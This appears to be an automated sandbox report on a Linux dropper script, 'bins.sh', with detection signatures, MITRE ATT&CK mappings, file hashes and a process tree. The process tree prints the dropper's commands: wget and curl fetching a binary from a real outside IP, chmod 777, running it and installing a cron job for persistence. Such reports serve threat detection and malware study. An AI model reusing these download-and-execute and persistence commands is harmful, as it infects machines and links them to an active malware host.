10e3e3e76552e191e9c880e374448c94e4d9ea8b76337345ffed3305d3b6722e

Analysis

max time kernel
149s
max time network
147s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
25-11-2024 17:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

ff11827cacbdfc494c394c5d8e7272db
SHA1

9acddf73007240f35b04f7fe4732d47cd0b04137
SHA256

10e3e3e76552e191e9c880e374448c94e4d9ea8b76337345ffed3305d3b6722e
SHA512

a045f1446bdb8160644c1e258d5a17327dc5d81b05bda3fddbe70b00007d6b63363d4b98f10a9c1fbcdf87befe5a73a543a4e0f7728feae5ad0e053384968958
SSDEEP

192:JBVtKqN2M/XoDM9VR9/9d9k9I9NGjOHBVtKq8sXU9VR9/9d9k9I9Ton:t2MfoDM9X9/9d9k9I9NG6m2U9X9/9d9y

Score

7^/10

antivm defense_evasion discovery execution persistence privilege_escalatio

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 1 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmod

pid	Process
691	chmod

Executes dropped EXE 1 IoCs

Processes:

VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr

ioc	pid	Process
/tmp/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr	692	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr

Renames itself 1 IoCs

Processes:

VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr

pid	Process
693	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalatio

Cron

T1053.003

Processes:

crontab

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.n0zzbJ	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Checks CPU configuration 1 TTPs 1 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

Processes:

curl

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

curlVaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsrcrontab

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/796/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/5/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/7/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/16/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/24/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/112/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/788/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/18/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/27/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/657/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/710/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/783/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/716/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/737/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/790/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/805/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/1/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/14/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/42/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/713/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/728/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/755/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/769/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/725/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/734/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/801/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/807/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/11/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/41/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/774/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/775/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/802/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/792/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/291/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/612/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/665/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/714/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/742/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/757/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/784/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/19/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/144/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/700/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/753/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/803/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/712/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/722/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/795/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/2/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/8/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/17/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/23/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/747/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/754/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/789/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/filesystems	crontab
File opened for reading	/proc/154/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/278/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/698/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/800/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/12/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
File opened for reading	/proc/699/cmdline	VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr

Writes file to tmp directory 3 IoCs

Malware often drops required files in the /tmp directory.

Processes:

wgetcurlbusybox

description	ioc	Process
File opened for modification	/tmp/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr	wget
File opened for modification	/tmp/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr	curl
File opened for modification	/tmp/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr	busybox

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:657
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:659
- /usr/bin/wget
  wget http://216.126.231.240/bins/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
  2⤵
  - Writes file to tmp directory
  PID:666
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:680
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
  2⤵
  - Writes file to tmp directory
  PID:689
- /bin/chmod
  chmod 777 VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
  2⤵
  - File and Directory Permissions Modification
  PID:691
- /tmp/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
  ./VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
  2⤵
  - Executes dropped EXE
  - Renames itself
  - Reads runtime system information
  PID:692
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:694
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:695
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:696
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      Reads runtime system information
      PID:697
- /bin/rm
  rm VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
  2⤵
  PID:699
- /usr/bin/wget
  wget http://216.126.231.240/bins/cd9nXhZl3yxf9bhkxC4vm1haymeJGfIkMR
  2⤵
  PID:702

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr

Filesize
119KB

MD5
1b166b95f9cb4b079ef1b9ec8363ddf3

SHA1
0d8eb08add467b3b5474f9b25909297fe7c2839c

SHA256
94a19b33124cbbc1c570b3338f4dfbb2bf1a9335a72acf22be02a9bb8a323cc9

SHA512
983ae0f399df2a6cf1dd48ba09098964c5dcb55b8bd049bce8e9c2c15dd88336642da64908d93221247a64ce987950b05042b0fac8474b179f0b1f7f0aca6925

Download Submit
/var/spool/cron/crontabs/tmp.n0zzbJ

Filesize
210B

MD5
a9577902da5d3691ce2b30d9d74fac97

SHA1
340d52918b5d80b975935581aa0494aaa11f5fe5

SHA256
59d239ae33d2a1626e2054e9d3134d722e20dc7afc78ac88b0561aaf51548a44

SHA512
a644bb2ccc400e15ccddac42ca2300590776c6ffee841c24c4aef265856d241afe4b0800132153032279d6b69ad816c858f8f1c700eb58b379f2e1aafac0aba4

Download Submit